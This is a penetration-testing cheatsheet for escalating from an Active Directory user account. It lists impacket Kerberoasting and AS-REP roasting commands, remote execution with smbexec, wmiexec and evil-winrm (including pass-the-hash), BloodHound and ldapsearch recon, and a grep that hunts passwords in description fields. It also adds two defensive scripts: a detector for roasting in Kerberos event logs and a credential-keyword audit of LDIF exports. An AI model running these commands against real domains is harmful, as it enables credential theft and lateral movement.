
Pivoting from an AD user account

This cheatsheet gathers common ways to pivot and escalate privileges in an Active Directory environment when you hold the credentials of a user or service account but cannot authenticate over interactive services such as RDP or WinRM.

```bash
# Kerberoast - request service tickets for accounts that have an SPN
GetUserSPNs.py -request domain.lan/user:'password' -dc-ip 192.168.1.10

# AS-REP roasting - accounts that do not require Kerberos pre-authentication
GetNPUsers.py domain.lan/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass
```
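Both techniques above leave a recognisable trace on the domain controller: Kerberoasting shows up as event 4769 (service ticket requested) with TicketEncryptionType 0x17 (RC4-HMAC) against user-type service accounts, and AS-REP roasting as event 4768 (TGT requested) with PreAuthType 0 and RC4. The following detection logic is an added example for the defensive side and is not part of the original cheatsheet; the event records are constructed sample data shaped like the EventData fields of the Windows Security log, and the burst threshold of three distinct SPNs per source is an assumption to tune against your own baseline.

```python
"""Flag Kerberos ticket requests that match Kerberoasting / AS-REP roasting patterns.

Added example. SAMPLE_EVENTS are constructed records (not real logs) modelled on
Windows Security events 4768 (TGT requested) and 4769 (service ticket requested).
"""
from collections import Counter

RC4_HMAC = "0x17"   # TicketEncryptionType: RC4-HMAC, the downgrade roasting tools ask for
NO_PREAUTH = "0"    # PreAuthType 0 on a 4768: TGT issued without pre-authentication

# Constructed sample events: one host requests three RC4 service tickets in a row,
# one normal AES ticket for a computer account, and one no-preauth RC4 TGT.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LAN", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LAN", "ServiceName": "svc_http",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LAN", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    # Normal AES (0x12) service ticket for a computer account: must not fire.
    {"EventID": 4769, "TargetUserName": "jdoe@DOMAIN.LAN", "ServiceName": "FILESRV01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    # TGT issued with no pre-authentication and RC4: AS-REP roasting pattern.
    {"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0",
     "IpAddress": "::ffff:10.0.0.50", "Status": "0x0"},
    # Normal TGT with PA-ENC-TIMESTAMP (type 2) and AES: must not fire.
    {"EventID": 4768, "TargetUserName": "jdoe", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2",
     "IpAddress": "::ffff:10.0.0.51", "Status": "0x0"},
]


def is_kerberoast_candidate(ev):
    """4769, successful, RC4 ticket for a user-type service account."""
    if ev["EventID"] != 4769 or ev.get("Status") != "0x0":
        return False
    svc = ev["ServiceName"]
    if svc.lower() == "krbtgt" or svc.endswith("$"):   # krbtgt / computer accounts are noise here
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def is_asrep_roast_candidate(ev):
    """4768, successful, TGT issued without pre-authentication and with RC4."""
    return (ev["EventID"] == 4768 and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == NO_PREAUTH
            and ev.get("TicketEncryptionType") == RC4_HMAC)


def triage(events, burst_threshold=3):
    """Return (alerts, bursts).

    alerts: (kind, requesting account, service name, source IP) per matching event.
    bursts: (source IP, account) pairs that requested >= burst_threshold RC4 service
            tickets, the bulk-request shape a roasting run produces.
    """
    alerts, per_source = [], Counter()
    for ev in events:
        if is_kerberoast_candidate(ev):
            per_source[(ev["IpAddress"], ev["TargetUserName"])] += 1
            alerts.append(("KERBEROAST_RC4", ev["TargetUserName"], ev["ServiceName"], ev["IpAddress"]))
        elif is_asrep_roast_candidate(ev):
            alerts.append(("ASREP_NOPREAUTH", ev["TargetUserName"], "-", ev["IpAddress"]))
    bursts = sorted(k for k, n in per_source.items() if n >= burst_threshold)
    return alerts, bursts


if __name__ == "__main__":
    alerts, bursts = triage(SAMPLE_EVENTS)
    for a in alerts:
        print("ALERT", *a)
    for ip, user in bursts:
        print(f"BURST {user} from {ip} requested several RC4 service tickets")
```

RC4 service tickets are not malicious on their own: they are also issued whenever the target account has no AES keys or `msDS-SupportedEncryptionTypes` still allows RC4, so baseline the domain first and treat the per-source burst as the stronger signal. Accounts that appear in the ASREP_NOPREAUTH alerts are the ones with "Do not require Kerberos preauthentication" set, which is the setting to remove.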

Authenticated network scan

```bash
nmap -v -sS -sC -sV -p- --script "smb*,msrpc*,rdp-*" \
  --script-args "smbusername=user smbpassword='password'" $IP
```

Remote command execution over SMB, WMI or WinRM

```bash
# smbexec (impacket tools take the target as domain/user:password@host, not -u/-p/-d)
impacket-smbexec [[domain/]username[:password]@]target

impacket-smbexec "Domain/user:password@$IP"
```

```bash
# wmiexec
impacket-wmiexec [[domain/]username[:password]@]target

impacket-wmiexec "Domain/user:password@$IP"
```

```bash
# evil-winrm
evil-winrm -i $IP -u user -p 'password'

# Authenticate with the administrator's NT hash (obtained e.g. with secretsdump)
sudo evil-winrm -u "Administrator" -H <administrator_hash> -i $IP
```

AD Recon via LDAP

```bash
# bloodhound-python
bloodhound-python -u user -p 'password' -d domain.lan \
  -dc 192.168.1.10 -c All

# ldapsearch example
ldapsearch -x -H ldap://192.168.1.10 \
  -D "domain\\user" -w 'password' -b "DC=domain,DC=lan"

# Search for potential passwords in user descriptions
ldapsearch -x -H ldap://$IP -D 'user@domain.lan' -w 'password' \
  -b 'dc=domain,dc=lan' '(&(objectClass=user)(description=*))' \
  sAMAccountName description | grep -Ei 'pass|mdp|motdepasse|forgot'
```
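The `grep` in the last command misses two things that ldapsearch output routinely contains: folded lines (a long description continues on the next line with a leading space) and base64-encoded values (`description::` for non-ASCII text such as French accents), and a bare `pass` also fires on words like "Passport". The script below is an added example, not part of the original cheatsheet, that parses the LDIF properly and applies a word-bounded keyword list; it is the same hygiene check an AD administrator would run against their own directory. The LDIF text is constructed sample data, and the keyword list is an assumption to extend for your environment.

```python
"""Audit AD user description fields for credential-like text.

Added example: parses LDIF as produced by ldapsearch and flags descriptions
that look like they carry a password. LDIF_SAMPLE is constructed sample data,
not output from a real domain.
"""
import base64
import re

# Word-bounded so that e.g. "Passport" or "bypass" do not fire; list is an assumption.
CRED_PATTERN = re.compile(
    r"\b(?:password|passwd|passphrase|pass|pwd|pw|mdp|motdepasse|mot de passe|"
    r"forgot|credential|creds)\b",
    re.IGNORECASE,
)

# Constructed ldapsearch-style LDIF: one folded line and one base64 ("::") value.
LDIF_SAMPLE = (
    "dn: CN=Jane Doe,OU=Users,DC=domain,DC=lan\n"
    "sAMAccountName: jdoe\n"
    "description: Helpdesk analyst\n"
    "\n"
    "dn: CN=svc backup,OU=Service Accounts,DC=domain,DC=lan\n"
    "sAMAccountName: svc_backup\n"
    "description: Backup service - initial pwd Summer2024! (change after\n"
    "  first logon)\n"                     # folded continuation line
    "\n"
    "dn: CN=Old Printer,OU=Users,DC=domain,DC=lan\n"
    "sAMAccountName: printer01\n"
    "description:: " + base64.b64encode(b"Mot de passe: Print@123").decode() + "\n"
    "\n"
    "dn: CN=Bob Smith,OU=Users,DC=domain,DC=lan\n"
    "sAMAccountName: bsmith\n"
    "description: Passport office liaison\n"   # must not fire on "Passport"
)


def parse_ldif(text):
    """Return a list of records, each a dict attr -> list of values.

    Handles LDIF line folding (a continuation line starts with one space, which
    is stripped and the rest appended to the previous line) and base64 values
    ("attr:: <b64>"). Comment and version lines are skipped.
    """
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)

    records, current = [], {}
    for line in unfolded + [""]:             # trailing "" flushes the last record
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        if line.startswith("#") or line.startswith("version:"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):            # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip(), []).append(value)
    return records


def find_credential_descriptions(ldif_text):
    """Return (sAMAccountName, matched keyword, description) for suspicious records."""
    findings = []
    for rec in parse_ldif(ldif_text):
        name = rec.get("sAMAccountName", ["<no sAMAccountName>"])[0]
        for desc in rec.get("description", []):
            m = CRED_PATTERN.search(desc)
            if m:
                findings.append((name, m.group(0).lower(), desc))
    return findings


if __name__ == "__main__":
    for name, token, desc in find_credential_descriptions(LDIF_SAMPLE):
        print(f"{name}: matched '{token}' in description: {desc!r}")
```

Pipe the output of the page's `ldapsearch` command (without the `grep`) into `find_credential_descriptions` to run it against a real export; every hit is a description to clear and an account whose password should be rotated, since the description attribute is readable by every authenticated domain user by default.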